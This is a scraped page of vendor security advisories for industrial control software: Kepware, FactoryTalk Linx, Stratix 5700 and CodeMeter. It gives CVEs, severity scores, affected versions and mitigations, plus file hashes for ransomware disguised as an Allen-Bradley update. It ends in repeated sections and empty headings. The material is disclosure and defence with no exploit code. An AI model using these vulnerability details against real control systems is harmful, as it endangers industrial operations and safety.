Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources are blocked.
Block all traffic to EtherNet/IP^™ or other CIP^™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article ID 898270.

Software/PC-based Mitigation Strategies

Do not use standalone PDC Field Edition
Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
Use Microsoft^® AppLocker or another similar allow list application to help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID 546989.
Confirm that the least-privilege user principle is followed and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

Social Engineering Mitigation Strategies

Do not open untrusted files with FactoryTalk AssetCentre.
Do not click or open URL links from untrusted sources.
Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

General Mitigations

Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID 494865
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

Critical

PN1539 | PN1539 | Vulnerabilities in the Kepware OPC UA server interface may lead to Denial-of-Service Conditions or Data Leak

Published Date:

December 17, 2020

Last Updated:

December 17, 2020

CVE IDs:

CVE-2020-27267, CVE-2020-27263

Products:

ThingWorx Industrial Connectivity, ThingWorx, Kepserver Enterprise

CVSS Scores:

7.5, 9.1

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 - December 17, 2020. Initial Release.

Executive Summary

Rockwell Automation received a report from PTC, a strategic partner of Rockwell Automation, regarding vulnerabilities in the Kepware OPC UA server interface for KEPServer Enterprise, ThingWorx® Kepware Server, and ThingWorx Industrial Connectivity. If successfully exploited, these vulnerabilities may result in the product ceasing to function. This may cause the following impacts: a loss of ability to configure the application, a loss of data, a loss of data acquisition, or a loss communication with control system assets.

Customers using affected versions of this server are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

KEPServer Enterprise, versions 6.6.504.0; 6.9.572.0
ThingWorx Industrial Connectivity, all versions
ThingWorx Kepware Server, all versions

Vulnerability Details

CVE-2020-27263: Heap-based Buffer Overflow
The affected products are vulnerable to a heap-based buffer overflow. Opening a specifically crafted OPC message could all a remote attacker to crash the server and potentially leak data.

CVSS v3.1 Base Score: 9.1 [Critical]
CVSS Vector: CVSS:3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

CVE-2020-27267: Use After Free
The affected products are vulnerable to a use after free vulnerability, which may allow an attacker to create and close OPC UA connections at a high rate that may cause a server to crash. Successful exploitation of this vulnerability may result in denial-of-service conditions.

CVSS v3.1 Base Score: 7.5 [High]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected products are encouraged to update to an available firmware revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below and are encouraged, when possible, to combine these options with the general security guidelines to employ multiple strategies simultaneously.

PTC recommends that users upgrade to the most current supported version.

	Recommended User Actions
	Base Version
Affected Product	6.6	6.7	6.8	6.9
KEPServer Enterprise (Download)	Apply version 6.6.550.0	--	--	Apply version 6.9.584.0
Thingworx Kepware Server (Download)	--	--	Apply version 6.8.839.0	Apply version 8.9.584.0
Thingworx Industrial Connectivity (Download)	Apply version 8.4 (6.6.362.0)	Apply version 8.5(6.7.1068)	--	--

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources are blocked.

General Mitigations

Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID 494865.
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

Critical

PN1536 | PN1536 | FactoryTalk® Linx® Affected by Multiple Denial-of-Service and Heap Overflow Vulnerabilities

Published Date:

November 24, 2020

Last Updated:

November 24, 2020

CVE IDs:

CVE-2020-27251, CVE-2020-27255, CVE-2020-27253

Products:

FactoryTalk Linx Gateway

CVSS Scores:

8.6, 9.8, 5.3

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 - November 24, 2020. Initial Release.

Executive Summary

Rockwell Automation PSIRT received a report from Claroty, an industrial security product vendor and research company, regarding three vulnerabilities in FactoryTalk® Linx software. If successfully exploited, these vulnerabilities may result in denial-of-service conditions, controlling of the execution flow or information disclosure. If the vulnerabilities are chained together, it may be possible to achieve remote code execution.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Special thanks to Claroty for discovering this vulnerability.

Affected Products

FactoryTalk Linx v6.11 and earlier.

Vulnerability Details

CVE-2020-27251: Remote Code Execution due to Heap Overflow
A heap overflow vulnerability exists within FactoryTalk Linx. This vulnerability could allow a remote, unauthenticated attacker to send malicious port ranges, which could result in remote code execution.

CVSS v3.1 Base Score: 9.8/10 [Critical]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2020-27253: Denial-of-service due to a flaw in Ingress/Egress checks routine
A flaw exists in the Ingress/Egress checks routine of FactoryTalk Linx. This vulnerability could allow a remote, unauthenticated attacker to specifically craft a malicious packet resulting in a denial-of-service condition on the device.

CVSS v3.1 Base Score: 8.6/10 [High]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVE-2020-27255: Information Disclosure and ASLR bypass due to Heap Overflow
A heap overflow vulnerability exists within FactoryTalk Linx. This vulnerability could allow a remote, unauthenticated attacker to send malicious set attribute requests, which could result in leaking sensitive information. This information disclosure could lead to the bypass of Address Space Layout Randomization (ASLR).

CVSS v3.1 Base Score: 5.3 /10 [Medium]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Risk Mitigation & User Action

Customers using the affected FactoryTalk Linx are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Vulnerability Details	Recommended User Actions
CVE-2020-27253 CVE-2020-27251 CVE-2020-27255	For FactoryTalk Linx v6.10 and v6.11 see Patch Answer ID BF25509 Additionally, the user could move to v6.20 which is available on the PCDC

General Security Guidelines

Software/PC-based Mitigation Strategies

Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
Use of Microsoft^® AppLocker or other similar whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation^® products is available at Knowledgebase Article ID QA17329.
Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

General Mitigations

Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
Locate control system networks and devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

PN1534 | PN1534 | Stratix 5700 HTTP Session Management Weakness

Published Date:

October 30, 2020

Last Updated:

October 30, 2020

Products:

Stratix 5700 Managed Switch

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

1.0

Revision History

Version 1.0 - October 30, 2020. Initial Release.

Executive Summary

Rockwell Automation’s PSIRT received a report from Amazon regarding a weakness on the Stratix 5700 switch. This weakness is a result of HTTP session management not being a feature of classic Cisco IOS. This may result in unauthenticated access to the web interface if an attacker gains access to the authenticated user’s computer after the “Logout” button has been selected. Rockwell Automation’s PSIRT has collaborated with the Cisco PSIRT to inform customers of this weakness. While this button’s function may lead the user to believe the session is being cleared, the product specifications do not advertise HTTP session management as a function. Both PSIRTs, to be transparent, see the importance of sharing this issue along with potential mitigation options.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products.

Affected Products

Allen-Bradley Stratix 5700 Industrial Managed Ethernet Switches –

All Cisco IOS releases (with the exception of those which incorporate the new HTTP session management feature added through Cisco BugID CSCvo20762) lack HTTP and HTTPS session management capabilities.

Details

On the Stratix 5700 Industrial Managed Ethernet switch running Cisco IOS , because no session management is performed for HTTP or HTTP sessions, the only way to close and terminate an active HTTP or HTTPS management session is to close the web browser used for this session after the user is done. Closing the active tab or active window is not enough - the browser instance must be terminated.

If the browser instance has not been terminated, an actor with local access to the machine from which the session was established may be able to restart the management session without being prompted for any credentials, which would result in this actor having the same kind of access to the device as the user on the previous session.

Risk Mitigation & User Action

As of 26-OCT-2020, the following releases incorporate the new HTTP session management code: 15.9(3)M2, 15.9(3)M2a and 15.2(7)E3. Going forward, it is the intention of Cisco for this HTTP session management feature to be implemented in all future Cisco IOS classic releases.

If HTTP session management is desired while running a release which does not support the enhancement, Cisco IOS customers are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy.

Completing the following precautionary measure is recommended as a risk mitigation strategy against unauthenticated attackers.

Terminate the browser when finished – closing the tab or window is NOT enough

General Security Guidelines

Software/PC-based Mitigation Strategies

Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
Use of Microsoft AppLocker or other similar Whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID QA17329.
Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

General Mitigations

Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
Locate control system networks and devices behind firewalls, and isolate them from the business network.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

PN923 | PN923 | Claims of ransomware masquerading as an Allen-Bradley Update

Published Date:

October 02, 2020

Last Updated:

October 02, 2020

Products:

Compliance / Audit Trail / Security, 6181X Hazardous Non-Display, ProcessPak, Integration Manager, SOS, dsShopLib, RSLogix 500, Arena, Foundation Server, Shop Operations, Reporting (form based), RSView32 WebServer, Database, FactoryTalk ViewPoint, SPC, Admin Tools, RSView32 SPC, FactoryTalk VantagePoint, App Solutions Documentation, Business Objects, Migration, Studio 5000 View Designer, 650R Non-Display Computers, 750R Non-Display Computers, FactoryTalk View SE, Reporting, Interface Manager, Operator Certification, RSLogix 5, Live Transfer, 6181 Computers, 1450R Non-Display Computers, RSLogix Emulate 5000 / Studio 5000 Logix Emulate, LiveData, Agile, Installation, RSLogix Emulate 500, Knowledge Documentation, RSLogix Emulate 5, Build Utility, Shop Operation, Foundation Client, NCR/CAR/IQA, RSView32, FactoryTalk Activation, Purge, FactoryTalk Historian SE, WSIntegrate, SoftLogix5800, RSView32 Messenger, FactoryTalk Linx Gateway, Supplier Manager, RSView32 Active Display, Maintenance Releases, Connected Components Workbench, Documentation, Activities, ETL, Historical Transfer, ECO, 6180 Computers with Keypad, Production Management Client, RSLadder, RMA, Data, Thin Client, Logix Designer, Administration, 6155 Compact Computers, Production Execution Client, Installation, 6181X Hazardous Integrated Display, Dashboard, JD Edwards, ActiveX Control, FactoryTalk Metrics, TrendX, Universe Manager, FactoryTalk AssetCentre, Knowledge Installation, Sampling Plans, Configuration Tool, FactoryTalk Transaction Manager, Consumer Packaged Goods Suite, Reports (Out-of-box), PlantMetrics, API, FactoryTalk Batch, FactoryTalk EnergyMetrix, FactoryTalk View ME, SoftLogix5, Process Designer, Reports (Custom), Automotive Suite , Quality Assurance (6.x), ICAPA, RSLogix Architect / Studio 5000 Architect, Equipment Manager, PlantPAx, Complaint Handling, Pavilion, FactoryTalk Services Platform

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Introduction

Claims of ransomware masquerading as an Allen-Bradley Update

Description

begin ignore

Version 2.0 - July 8th 2016

Rockwell Automation has learned about the existence of a malicious file called "Allenbradleyupload.zip" that is being distributed on the internet. This file is NOT an official update from Rockwell Automation, and we have been informed that this file contains a type of ransomware malware that, if successfully installed and launched, may compromise the victim’s computer. This advisory is intended to raise awareness to control system owners and operators of reports of the file’s existence as a result of reports Rockwell Automation received from the Electricity Information Sharing and Analysis Center ("E-ISAC").

Update 08-JUL-2016: Our investigation has confirmed the existence of the reported malware through VirusTotal.com. According to VirusTotal, it "is a free service that analyzes suspicious files and URLs and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware." According to information on VirusTotal.com, the file "Allenbradleyupload.zip" contains a single file called "Allenbradleyupload.exe", which may be malicious. File hashes and links to VirusTotal.com are in the table that follows below. These file hash values can be used with Application Whitelisting technologies to reduce the ability of this malware to execute on a system. According to VirusTotal, most of the antivirus/anti-malware vendors have updated their databases to detect this malware. However, we strongly recommend ensuring that your antivirus programs and virus definitions are up to date.

File Name Hash Type Hash Value

Allenbradleyupload.zip MD5 b552a95bd3eceb1770db622a08105f52

SHA-1 4dbba01786068426c032a7524e31668f2435d181

SHA-256 e7b4a2c05e978b86a231fa276db29bb8362bd25160bdeb4c2239cb614d7f44df

Allenbradleyupload.exe MD5 49067f7b3995e357c65e92d0c7d47c85

SHA-1 5f8c4246fc24d400dffef63f25a44b61932b13af

SHA-256 97ec86160dea82a17521a68076fe0d5537f60577b79338e67a15528115e94b88

Rockwell Automation confirms that this malware is NOT an official product update and it is not connected with any Rockwell automation product, software update, or website.

Rockwell Automation decided to provide this advisory since the attackers have used the Rockwell Automation brand name on the file, possibly as a means to increase the likelihood of an ICS-knowledgeable user to download and execute the malware as part of their strategy. We are continuing to monitor this situation, and we will update this advisory as we learn more.

BACKGROUND

Ransomware is a class of malware that aims to extort money from the victim by restricting access to resources on the computer, and then demands a monetary ransom in order to remove the restrictions. The most common type is ransomware that will encrypt important files on an infected computer, rendering the files unusable without paying a ransom. Other types may restrict access to operating system functions or specific applications. Typically the user is required to pay the ransom in some form of untraceable currency, and must do so before the deadline expires and the decryption key is destroyed.

According to the September/October 2015 issue of the ICS-CERT Monitor, "Ransomware, such as Cryptolocker or TeslaCrypt, is currently one of the most prolific categories of malware growth, rising 165 percent in varieties seen between the fourth quarter of 2014 and the first quarter of 2015".

CUSTOMER RISK MITIGATIONS

Where feasible, precautions and risk mitigation strategies to this type of attack, like those listed below are recommended. When possible, multiple strategies should be employed simultaneously.

Obtain product software and firmware from Rockwell Automation’s official download portal, available at http://www.rockwellautomation.com/global/support/drivers-software-downloads.page.

Follow industry best-practices to harden your PCs and Servers, including anti-virus/anti-malware and application whitelisting solutions. These recommendations are published in KB546987.

Consult VirusTotal.com’s analysis of the malware (using the links above), to determine if your deployed antivirus solution is able to detect this malware. (UPDATED 08-JUL-2016)

Analyze outbound network traffic against the known indicators of compromise (IoC), available from the US-CERT portal, to identify and assess the risk of any unusual network activity.

Develop, and then deploy, backup and disaster recovery policies and procedures. Test backups on a regular schedule.

Implement a change management system to archive network, controller and computer assets (e.g., clients, servers and applications).

Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack, which can also serve as a vehicle for malware infection.

Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet

Locate control system networks and devices behind firewalls, and isolate them from the business network.

Refer to http://www.rockwellautomation.com/rockwellautomation/products-technologies/network-technology/architectures.page? for comprehensive information about implementing validated architectures designed to deliver these measures.

We also recommend concerned customers continue to monitor this advisory, Rockwell Automation’s Security Advisory Index at https://www.rockwellautomation.com/en-us/company/about-us/sustainability/trust-security/security-advisories.html, and the company public security webpage at http://www.rockwellautomation.com/security for new and relevant information relating to this matter.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site at http://www.rockwellautomation.com/solutions/security.

end ignore

KCS Status

Released

Critical

PN1530 | PN1530 | FactoryTalk Activation Manager affected by CodeMeter Vulnerabilities

Published Date:

September 18, 2020

Last Updated:

September 18, 2020

CVE IDs:

CVE-2020-14517, CVE-2020-16233, CVE-2019-14519, CVE-2020-14519, CVE-2020-14515, CVE-2020-14509, CVE-2020-14513

Products:

FactoryTalk Activation

CVSS Scores:

7.4, 8.1, 9.4, 7.5, 10.0

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Revision History

Revision Number

4.0

Revision History

Version 4.0 -- September 18, 2020. Update to reflect current mitigations. Updated links.
Version 3.0 -- September 16, 2020. Update to reflect current remediations and information from Wibu. See update below.
Version 2.1 -- September 15, 2020. Update to adjust language.
Version 2.0 -- September 14, 2020. Update regarding affected CodeMeter versions and vulnerability information.
Version 1.0 – September 08, 2020

Executive Summary

Rockwell Automation received a report from Claroty, an industrial security product vendor and research company, regarding vulnerabilities in Wibu-Systems’ CodeMeter. These vulnerabilities, if successfully exploited, may result in remote code execution, privilege escalation, or denial of service conditions to the products dependent on CodeMeter. CodeMeter is distributed as part of the installation for FactoryTalk Activation Manager. FactoryTalk Activation Manager enables customers to manage licensed content and activate Rockwell Automation software products.

Claroty has released documentation that outlines the vulnerabilities in detail. This information may make it easier for an adversary to compromise the host running Wibu CodeMeter. Customers using the affected versions of FactoryTalk Activation Manager and/or CodeMeter should implement the mitigations detailed below as soon as possible.

Affected Products

FactoryTalk Activation (FTA) Manager v4.05.00 and earlier running Wibu-Systems CodeMeter v7.10 or earlier.

The following products require FactoryTalk Activation Manager to store and keep track of Rockwell Automation software products and activation files. Customers who use the products from the following list in their install base contain FactoryTalk Activation Manager.

Arena^®software
Emonitor^® software
FactoryTalk^® AssetCentre software
FactoryTalk

File Name	Hash Type	Hash Value
Allenbradleyupload.zip	MD5	b552a95bd3eceb1770db622a08105f52
	SHA-1	4dbba01786068426c032a7524e31668f2435d181
	SHA-256	e7b4a2c05e978b86a231fa276db29bb8362bd25160bdeb4c2239cb614d7f44df
Allenbradleyupload.exe	MD5	49067f7b3995e357c65e92d0c7d47c85
	SHA-1	5f8c4246fc24d400dffef63f25a44b61932b13af
	SHA-256	97ec86160dea82a17521a68076fe0d5537f60577b79338e67a15528115e94b88

Rockwell Automation Security Advisories

CVE-2025-23120

AFFECTED PRODUCTS AND SOLUTION

VULNERABILITY DETAILS

Mitigations and Workarounds

Revision History

Executive Summary

Affected Products

Risk Mitigation & User Action

Additional Resources

Revision History

Executive Summary

Affected Products

Vulnerability Details

Risk Mitigation & User Action

Additional Resources

Revision History

Affected Products

Vulnerability Details

Risk Mitigation & User Action

Additional Resources

Revision History

Revision Number

Revision History

Affected Products

Vulnerability Details

CVE-2023-29464 IMPACT

Risk Mitigation & User Action

Additional Resources

Revision History

Revision Number

Revision History

Executive Summary

Affected Products

Vulnerability Details

Risk Mitigation & User Action

Additional Resources

Revision History

Revision Number

Revision History

Executive Summary

Affected Products

Vulnerability Details

Risk Mitigation & User Action

Additional Resources

Revision History

Revision Number

Revision History

Executive Summary

Affected Products

Vulnerability Details

Risk Mitigation & User Action

Additional Resources

Revision History

Affected Products

Vulnerability Details

Risk Mitigation & User Action

Additional Resources

Revision History

Revision Number

Revision History

Affected Products

Vulnerability Details

CVE-2023-2071 IMPACT

Risk Mitigation & User Action

Additional Resources

Revision History

Revision Number

Revision History

Affected Products

Vulnerability Details

CVE-2023-29463 IMPACT

Risk Mitigation & User Action

Additional Resources

Affected Products

Vulnerability Details

Risk Mitigation & User Action

Additional Resources

Affected Products

Vulnerability Details